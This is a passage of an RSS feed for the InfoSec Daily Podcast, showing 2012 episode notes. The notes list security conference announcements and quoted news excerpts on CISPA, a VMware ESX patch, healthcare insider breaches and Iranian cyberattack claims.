<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.5158419227227569"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">[end]</span></b></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-659-lone-protester-ms-finding-mac-bugs-mystery-group-bart-and-and-dropping-chinese/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3887/0/infosec-daily-podcast-episode-659.mp3" length="16358591" type="audio/mpeg" />
		<itunes:duration>0:34:02</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 659 for May 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.

	
Announcements
GraniteSec (for[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 659 for May 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.

	
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012
	Where: &#160;Veasey Memorial Park, Groveland, MA
	http://granitesec.org

	
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/

	
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org

	
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014

	
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training

	
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

	
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com

	
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com

	
Please consider making your Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
Or simply use our QR Code Links.
Amazon:
Amazon UK:
You don't have a sufficient version of Flash Player to display this animation.

	
Stories
Source: &#160;http://www.forbes.com/sites/andygreenberg/2012/05/01/mozilla-slams-cispa-breaking-silicon-valleys-silence-on-cybersecurity-bill/
Not to be lumped in with Microsoft, Apple, Facebook, Oracle and other CISPA supporters in the tech world, Mozilla announced Wednesday that it stands opposed to the cybersecurity bill.
In a statement sent to Forbes, the company&#8217;s Privacy and Public Policy had the following to say about CISPA:
While we wholeheartedly support a more secure Internet, CISPA has a broad and alarming reach that goes far beyond Internet security. The bill infringes on our privacy, includes vague definitions of cybersecurity, and grants immunities to companies and government that are too broad around information misuse. We hope the Senate takes the time to fully and openly consider these issues with stakeholder input before moving forward with this legislation.
&#8230;
Source: https://www.computerworld.com/s/article/9226777/Microsoft_detects_new_malware_targeting_Apple_computers
Microsoft has detected a new piece of malware targeting Apple OS X computers that exploits a vulnerability in the Office productivity suite patched nearly three years ago.
The malware is not widespread, wrote Jeong Wook Oh of Microsoft&#39;s Malware Protection Center. But it does show that hackers pay attention if it&#39;s found people do not apply patches as those fixes are released, putting their computers at a higher risk of becoming infected.
&#34;Exploiting Mac OS X is not much different from other operating systems,&#34; Oh wrote. &#34;Even though Mac OS X has introduced many mitigation technologies to reduce risk, your protection against security vulnerabilities has a direct correlation with updating installed applications.&#34;
&#8230;
Source: &#160;http://www.zdnet.com/blog/security/mystery-group-hacks-us-military-harvard-nasa-more/11789
A hacker group calling itself &#8220;The Unknowns&#8221; claims to have hacked 10 organizations around the world, gaining administrator access for all and leaking data for some. Most are related to the U.S. govern[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 658 &#8211; ESX Patch, Healthcare Struggles, Iran Admits to Attacks, Skype SuperNodes, and Chrome</title>
		<link>http://www.isdpodcast.com/episode-658-esx-patch-healthcare-struggles-iran-admits-to-attacks-skype-supernodes-and-chrome</link>
		<comments>http://www.isdpodcast.com/episode-658-esx-patch-healthcare-struggles-iran-admits-to-attacks-skype-supernodes-and-chrome#comments</comments>
		<pubDate>Thu, 03 May 2012 00:53:47 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3882</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 658 for May 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Karthik Rangarajan. Announcements GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012 Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec.org AIDE 2012 When: May 21-25, 2012 Where: MU Forensic Science Center &#160;- Huntington, [...]]]></description>
			<content:encoded><![CDATA[<p><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">InfoSec Daily Podcast Episode 658 for May 2, 2012. &nbsp;</span><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Karthik Rangarajan.</span></b></p>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Announcements</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">GraniteSec (formerly The New England InfoSec Tweetup)<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;May 19, 2012<br />
	Where: &nbsp;Veasey Memorial Park, Groveland, MA<br />
	</span><a href="http://granitesec.org/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://granitesec.org</span></a></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">AIDE 2012<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 21-25, 2012<br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br />
	</span><a href="http://www.appyide.org/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.appyide.org/</span></a></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">LayerOne 2012<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 26-27, 2012<br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br />
	</span><a href="http://www.layerone.org/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.layerone.org</span></a></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: June 20 &#8211; 27, 2012<br />
	Where: Courtyard Seattle Federal Way, WA <br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.sans.org/mentor/details.php?nid=28014</span></a></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Social Engineering Training</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21-24, 2012<br />
	Where: Black Hat Vegas</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: August 20-24, 2012<br />
	Where: &nbsp;Bristol, UK</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;November 12-16, 2012<br />
	Where: &nbsp;Columbia, MD<br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.social-engineer.com/social-engineer-training</span></a></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Inside and Out of the Social-Engineer Toolkit (SET)<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21 &#8211; 22, 2012<br />
	When: July 23 &#8211; 24, 2012<br />
	Where: Black Hat Vegas<br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;September 27-30, 2012<br />
	Where: Louisville, KY<br />
	</span><a href="http://www.derbycon.com/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.derbycon.com</span></a></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Skydogcon<br />
	</span><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: October 26-28<br />
	Where: Hotel Preston in Nashville, TN <br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.skydogcon.com</span></a></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Please consider making your Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Or simply use our QR Code Links.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon:</span><img height="135px;" src="https://lh3.googleusercontent.com/1KUwl-SZ2clgzOl51zmFRcr1xwqGbY_QAmRtCB2ovCMguldzcJfHRbNtlnYBZa5Bf7CFo4dBmVHMZru27Qp5Fq_8BTsvQgXFdQyKTrOeN-THMAIy1q8" width="135px;" /></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon UK:</span><img height="138px;" src="https://lh6.googleusercontent.com/yo3QDglfeqZEJKYr4ToFea0RlFiFp9LRYknVDck5qY8mJFfuBFpvsBFkMC3uwD0efVWkDpj00kJtSZOpXI7jzW5Kx8ClXoSp5mGcknz4TwXgetLXgJk" width="138px;" /></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Stories</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://www.h-online.com/security/news/item/VMware-patches-vulnerabilities-in-ESX-4-1-1564129.html"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.h-online.com/security/news/item/VMware-patches-vulnerabilities-in-ESX-4-1-1564129.html</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Virtualization specialist</span><a href="http://www.vmware.com/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> VMware</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> is warning customers about multiple security holes in versions 4.0 and 4.1 of its ESX enterprise-level computer virtualization product.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">According to the company, the Service Console in ESX 4.1 on unpatched systems can be exploited by a local user in a guest virtual machine to gain escalated privileges, or by a malicious remote user to cause a denial-of-service (DoS) condition or compromise a victim&#39;s system. In its advisory, VMware notes that some of these holes, found in previous versions of the libxml2 XML C parser and toolkit used by the ESX Console Operating System (COS), have been closed by updating libxml2 to a newer release.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Versions 4.0 and 4.1 of ESX are affected; vCenter, ESXi and ESX 3.5 as well as hosted products such as VMware Workstation, Player, ACE and Fusion are not vulnerable. Patches are</span><a href="http://kb.vmware.com/kb/2013057"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> available for ESX 4.1</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> that correct these problems, while patches for version 4.0 are listed as &quot;pending&quot;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Further information about the vulnerabilities can be found in the company&#39;s</span><a href="http://www.vmware.com/security/advisories/VMSA-2012-0008.html"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> security advisory</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://www.darkreading.com/insider-threat/167801100/security/news/232901235/healthcare-unable-to-keep-up-with-insider-threats.html"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.darkreading.com/insider-threat/167801100/security/news/232901235/healthcare-unable-to-keep-up-with-insider-threats.html</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">April has been a brutal month for healthcare, with three major breaches disclosed accounting for nearly 1.1 million records lost. The thread woven throughout each has been the role of insiders &#8212; both malicious and inept &#8212; in triggering the incidents.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">In one case at the Utah Department of Health, approximately 780,000 Medicaid records were exposed due to the misconfiguration of a server containing these files. Human error also accounted for the loss of 315,000 patient records at Emory Healthcare, when 10 backup disks went missing from a storage facility at Emory University Hospital. Meanwhile at South Carolina&#39;s Department of Health and Human Services, an employee sent 228,000 Medicaid patient records to himself via email. The investigation is still ongoing, but already the employee, Christopher Lykes, was fired and arrested by the South Carolina State Law Enforcement Division for his malfeasance.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">According to experts, these three incidents are representative of the types of consequences healthcare organizations face when they fail to address insider threats through improved employee screening, monitoring, data controls, and security awareness training. According to Rick Dakin, CEO of the IT security consulting firm Coalfire Systems, more than half of the insider incidents his company investigates involve an insider in some way, shape, or form.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;It&#39;s not typically malicious &#8212; the bulk of the insider threat is lack of knowledge. Users access data, leave data on systems, and it&#39;s not maliciously intended,&quot; says Dakin, who says that regardless of intent, insider incidents tend to occur due to the same weaknesses. &quot;The insider threat follows the same vector: lack of access controls. A lack of monitoring. The lack of data loss prevention tools. There&#39;s a series of control breakdowns that allow insider threats to maliciously or just through human error and mistake access data and compromise the data.&quot;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">One of the big difficulties in convincing healthcare organizations to put the proper controls in place has been in getting organizations to adopt effective risk assessment and risk management practices. The healthcare industry has been notoriously incapable of pinpointing risks in general, let alone those from insiders.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;If you understand the threats and the vulnerability that was exploited, then we can make those kinds of control changes that would really have an impact. We&#39;re not there as an industry. Not that some organizations aren&#39;t doing that. But we&#39;re not there,&quot; says Lisa Gallagher, senior director of privacy and security for the Healthcare Information and Management Systems Society (HIMSS). &quot;The only incentive that we seem to have are the regulatory ones. And that set of incentives might not be complete.&quot;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">As she states, the numbers from Health and Human Services (HHS) show that more than 60 percent of breaches reported to HHS in response to HIPAA mandates occur due to the loss or theft of portable devices, be they laptops, smartphones, external drives, or, as was the case at Emory, backup tapes.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;That&#39;s interesting because if you took it on its face value, you would think that it means that people are just sloppy in what they do and keep losing stuff and getting it stolen,&quot; Gallagher says. &quot;We sort of focus then on employee training &#8212; monitoring the actual practice and then sanctioning it if there are any issues there. Which is a good thing to do. Don&#39;t get me wrong, I really think we need to work very hard at that.&quot;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The problem, though, is that the HHS numbers tell only a small part of the story, Gallagher says. For example, the numbers give little indication as to how many of those missing drives are gone due to coordinated theft by data thieves out to mine that data for fraudulent purposes and how many fell off the back of a truck. And the numbers also don&#39;t include incidents that an organization has been unable to detect &#8212; an indeterminate volume of breaches that Gallagher suspects keeps growing.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://news.techworld.com/security/3355247/iran-admits-cyberattacks-in-several-government-agencies"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://news.techworld.com/security/3355247/iran-admits-cyberattacks-in-several-government-agencies</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The Iranian government acknowledged today that authorities have found evidence of recent cyberattacks against several agencies, according to reports by state-sponsored media outlets.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">A week ago, the country&#39;s oil ministry confirmed that it and other facilities in the energy industry had been</span><a href="http://www.computerworld.com/s/article/9226469/Iran_confirms_cyberattacks_against_oil_facilities"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> targeted by malware attacks</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Today, the</span><a href="http://www.mehrnews.com/en/newsdetail.aspx?NewsID=1590815"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> Mehr News Agency</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> said that Esmaeil Ahmadi-Moqaddam, Iran&#39;s national police chief, had claimed that his office has &quot;found clues about recent cyberattacks on a number of Iranian ministries and companies.&quot;</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Mehr is a semi-official arm of the Iranian government.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The report did not spell out what &quot;clues&quot; police had found, or which ministries and companies had been attacked.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;In cooperation with the Information and Communications Technology Ministry, the Intelligence Ministry, and the ministries which have been targeted by cyber attacks, we are investigating and pursuing the matter&#8230;and we have found clues in this relation,&quot; Mehr quoted Ahmadi-Moqaddam as saying.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">On Sunday,</span><a href="http://www.mehrnews.com/en/NewsDetail.aspx?pr=s&amp;query=cyber%20&amp;NewsID=1588923"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> Mehr</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> reported that the Ministry of Science, Research, and Technology had repelled a cyber assault, but did not put a date to the attack.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">That ministry, like other Iranian agencies that earlier admitted attacks, claimed it had come out unscathed.</span></b></div>
